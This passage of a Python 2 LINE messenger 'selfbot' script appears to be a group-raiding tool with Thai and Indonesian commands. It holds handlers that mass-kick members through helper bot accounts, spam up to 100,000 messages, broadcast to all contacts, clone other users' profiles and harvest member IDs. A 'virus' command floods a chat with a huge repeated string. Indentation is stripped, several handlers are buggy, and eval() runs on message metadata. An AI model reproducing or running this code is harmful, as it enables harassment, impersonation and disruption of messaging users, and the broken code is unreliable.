soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#==================================================
elif msg.text in ["ทีมงาน","ทีมทดลองบอท"]:
msg.contentType = 13
cl.sendText(msg.to, "[SELFBOT PHET HACK BOT]\n\n[☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢]\n[By.ทีมงานทีมทดลองบอท]")
cl.sendText(msg.to, "ผู้จัดการทีมงาน:kielovebot")
msg.contentMetadata = {'mid': 'uca51afa767df87ba3705494b97c3355c'}
cl.sendMessage(msg)
#=====================================================
elif 'Chah' in msg.text:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "NADYA,'"}
cl.sendMessage(msg)
#-----------------------------------------------
#==================================================
#=====================================================
#=================================================================================
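# Translation commands: Tr-id/Tr-en/Tr-th go through a Translator() helper (presumably
# googletrans), while the Id@en / En@id / Id@th / Th@id variants scrape translate.google.com
# directly with urllib2 and pull the result out of the HTML.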
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═�����═══════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
#=========================================
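# Mimic mode: when wait3["copy"] is on, messages from mids stored in wait3["target"] are
# presumably echoed back by a handler elsewhere in the script; the commands below only toggle
# the flag and maintain the target list.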
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#========================================
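# "Nk <name>": opens the group's ticket lock, pulls ki3 in by ticket, then uses it to kick
# every member whose display name contains the given text before re-locking the group.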
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
						ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
						ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
			cl.updateGroup(gs)
#----------------------------------------------------
elif msg.text in ["Aslogin","ขอลิ้ง"]:
if LINETCRLogged == False:
ki.login(qr=True)
ki.loginResult()
user2 = ki.getProfile().mid
LINETCRLogged = True
cl.sendText(msg.to,"ล็อคอินสำเร็จ Asul พร้อมใช้งานแล้ว")
else:
cl.sendText(msg.to,"Asul ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if LINETCRLogged == True:
try:
ki.sendText(user1,tlist)
except:
ki.new_post(tlist)
else:
cl.sendText(msg.to,"Asul ยังไม่ได้ล็อคอิน")
#-----------------------------------------------------------)
elif msg.text in ["Help2","Key","KEY"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,help2Message)
else:
cl.sendText(msg.to,help2Message)
#----------------------ADMIN COMMAND------------------------------#
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Mention","Tagall","มอง","."]:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Ratakan" in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Ratakan","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("all","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Sukses Bosqu")
cl.sendText(msg.to,"masih mauko sundala")
elif msg.text in ["List grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = "===[List Groups]==="
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = cl.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h += "\n[" + groups.name + "] ->(" + members +")\n -+GroupID : " + i
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h + "\n|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
j = "===[List Groups Invited]==="
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j += "\n[" + groups.name + "] ->(" + members + ")\n -+GroupID : " + i
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j + "\n|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif msg.text in ["Info grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
cl.sendText(msg.to,"===[List Details Group]===")
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = ki.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h)
cl.sendText(msg.to,"|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
cl.sendText(msg.to,"===[List Details Groups Invited]===")
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j)
cl.sendText(msg.to,"|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))
elif "Cancel invite: " in msg.text:
if msg.from_ in admin:
gids = msg.text.replace("Cancel invite: ","")
gid = cl.getGroup(gids)
if gid is not None:
try:
cl.rejectGroupInvitation(gids)
cl.sendText(msg.to,"Berhasil tolak undangan dari grup " + gid.name)
except:
cl.sendText(msg.to,"Error!")
else:
cl.sendText(msg.to,"Grup tidak ditemukan")
elif msg.text in ["Accept invite"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
_list = ""
for i in gid:
if i is not None:
gids = cl.getGroup(i)
_list += gids.name
cl.acceptGroupInvitation(i)
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil terima semua undangan dari grup :\n" + _list)
else:
cl.sendText(msg.to,"Tidak ada grup yang tertunda saat ini")
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif ("Gname: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gname: ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Tidak Dapat Mengubah Nama Grup")
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["Invite:","ดึง:"]:
if msg.from_ in admin:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "My @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("My @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy1 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy1 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki.cloneContactProfile(target)
ki.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy2 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy2 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki2.cloneContactProfile(target)
ki2.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy3 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy3 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki3.cloneContactProfile(target)
ki3.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy4 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy4 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki4.cloneContactProfile(target)
ki4.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy5 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy5 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki5.cloneContactProfile(target)
ki5.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["backup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
ki.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
ki.sendText(msg.to, str (e))
elif "Bc:ct " in msg.text:
bctxt = msg.text.replace("Bc:ct ", "")
a = cl.getAllContactIds()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:ct " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:ct ", "")
b = ki.getAllContactIds()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getAllContactIds()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getAllContactIds()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getAllContactIds()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getAllContactIds()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Bc:grup " in msg.text:
bctxt = msg.text.replace("Bc:grup ", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:grup " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:grup ", "")
b = ki.getGroupIdsJoined()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getGroupIdsJoined()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getGroupIdsJoined()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getGroupIdsJoined()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getGroupIdsJoined()
for manusia in f:
ki5.sendText(manusia, (bctxt))
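# "Spam <on|off> <count> <text>": with "on" the text is sent <count> times as separate
# messages; with "off" it is sent once as a single message containing <count> repeated lines.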
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif msg.text in ["me","Me","คท","กู"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif cms(msg.text,["แอดมิน","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admin[0]} # admin appears to be a list; a contact message needs a single mid
cl.sendText(msg.to," My Creator ")
cl.sendMessage(msg)
cl.sendText(msg.to," Dont Kick out From group ")
elif "Inviteme: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Inviteme: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif msg.text in ["Clear grup"]:
if msg.from_ in admin:
for b in [ki,ki2,ki3,ki4,ki5]:
gid = b.getGroupIdsJoined()
for i in gid:
b.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Ginfo","เชคกลุ่ม"]:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text == "ไวรัส01":
cl.sendText(msg.to,"หยุดดดดดด....\nขอให้ทุกคนอยู่ในความสงบ\n\n 1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1